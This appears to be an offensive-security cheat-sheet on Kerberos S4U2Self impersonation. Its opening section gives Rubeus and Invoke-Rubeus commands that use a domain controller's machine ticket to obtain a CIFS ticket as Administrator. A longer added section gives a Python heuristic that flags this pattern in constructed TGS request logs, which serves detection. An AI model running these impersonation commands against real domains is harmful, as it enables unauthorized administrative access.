
S4U2Self

If we manage to obtain a Ticket Granting Ticket (TGT) for a computer account on the domain and then import that ticket into a logon session, we still would not be able to access that system. This is because computer accounts do not have remote access privileges over themselves.

S4U2Self allows us to obtain a Ticket Granting Service (TGS) ticket as a user who we know has administrative rights over the Domain Controller, for example any Domain Administrator.

1) Rubeus

Syntax

Rubeus.exe s4u /impersonateuser:[User-To-Impersonate] /self /altservice:[Service/FQDN] /user:[User] /ticket:[Base64 Ticket] /nowrap

In practice

Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:cifs/dc01.security.local /user:dc01$ /ticket:iujhdfdsf== /nowrap

2) Invoke-Rubeus

Invoke-Rubeus -Command "s4u /impersonateuser:[User-To-Impersonate] /self /altservice:[Service/FQDN] /user:[User] /ticket:[Base64 Ticket] /nowrap"
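The commands above all follow the same shape: a computer account's TGT (dc01$) is used to request a service ticket, naming a different user (Administrator), for a service on that same computer (cifs/dc01.security.local). From the defender's side, that shape is what a TGS request log can be reviewed for. The following is an added example, not code from the original page or from the Rubeus project: a small Python heuristic over constructed TGS request records. The record schema ("client", "for_user", "sname") and the sample values are assumptions made for this example; they are not the layout of Windows Event ID 4769, so map the field names to whatever your sensor actually emits.

```python
"""Heuristic review of Kerberos TGS requests for the S4U2Self-to-self pattern.

Added example (constructed, not from the original page or from Rubeus):
flag requests where a computer account presents its own TGT and asks, via
PA-FOR-USER, for a service ticket in another user's name to a service that
is hosted on that same computer.
"""
from typing import Dict, List, Optional, Set

# Constructed sample records. The field names are an assumption for this
# example and do not correspond to the Windows Event ID 4769 layout.
SAMPLE_TGS_REQUESTS: List[Dict[str, Optional[str]]] = [
    # Ordinary user requesting a file-share ticket on the DC: not S4U2Self.
    {"client": "alice@SECURITY.LOCAL", "for_user": None,
     "sname": "cifs/dc01.security.local"},
    # Workstation account requesting a ticket to another host: normal.
    {"client": "WS01$@SECURITY.LOCAL", "for_user": None,
     "sname": "ldap/dc01.security.local"},
    # The pattern from the page: dc01$ TGT, for-user Administrator, service on dc01.
    {"client": "DC01$@SECURITY.LOCAL", "for_user": "Administrator@SECURITY.LOCAL",
     "sname": "cifs/dc01.security.local"},
    # Same mechanism on a member server impersonating a regular user: review, lower priority.
    {"client": "WEB01$@SECURITY.LOCAL", "for_user": "bob@SECURITY.LOCAL",
     "sname": "http/web01.security.local"},
]


def principal_name(principal: str) -> str:
    """Strip the realm: 'DC01$@SECURITY.LOCAL' -> 'DC01$'."""
    return principal.split("@", 1)[0]


def computer_host(principal: str) -> Optional[str]:
    """Short host name for a computer account ('DC01$' -> 'DC01'), else None."""
    name = principal_name(principal)
    return name[:-1].upper() if name.endswith("$") else None


def spn_host(sname: str) -> str:
    """Short host from an SPN: 'cifs/dc01.security.local' -> 'DC01'."""
    _, _, host = sname.partition("/")
    return host.split(":", 1)[0].split(".", 1)[0].upper()


def is_s4u2self_to_self(event: Dict[str, Optional[str]]) -> bool:
    """True when a computer account requests, in another user's name, a ticket
    for a service hosted on itself (the S4U2Self shape shown on the page)."""
    host = computer_host(event["client"] or "")
    for_user = event.get("for_user")
    if host is None or not for_user:
        return False
    # A computer naming itself in PA-FOR-USER is not the pattern of interest.
    if principal_name(for_user).upper() == host + "$":
        return False
    return spn_host(event["sname"] or "") == host


def find_s4u2self_candidates(events: List[Dict[str, Optional[str]]],
                             privileged_users: Set[str],
                             domain_controllers: Set[str]) -> List[Dict[str, str]]:
    """Return one finding per matching event; severity is 'high' when the
    impersonated user is privileged or the host is a domain controller."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        if not is_s4u2self_to_self(ev):
            continue
        host = computer_host(ev["client"] or "") or ""
        user = principal_name(ev["for_user"] or "").lower()
        severity = "high" if (user in privileged_users or host in domain_controllers) else "medium"
        findings.append({"host": host, "impersonated": user,
                         "sname": ev["sname"] or "", "severity": severity})
    return findings


if __name__ == "__main__":
    # Privileged-user and DC lists are assumed inputs; populate from your directory.
    for finding in find_s4u2self_candidates(SAMPLE_TGS_REQUESTS, {"administrator"}, {"DC01"}):
        print(finding)
```

The only request it raises to high severity is the one that mirrors the page's Rubeus command: a domain controller's own account asking for a ticket to itself in the Administrator's name. The web server case is kept at medium because S4U2Self to self is also what a legitimately delegating service does, so the host and the impersonated user, not the mechanism alone, decide how urgent the finding is.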
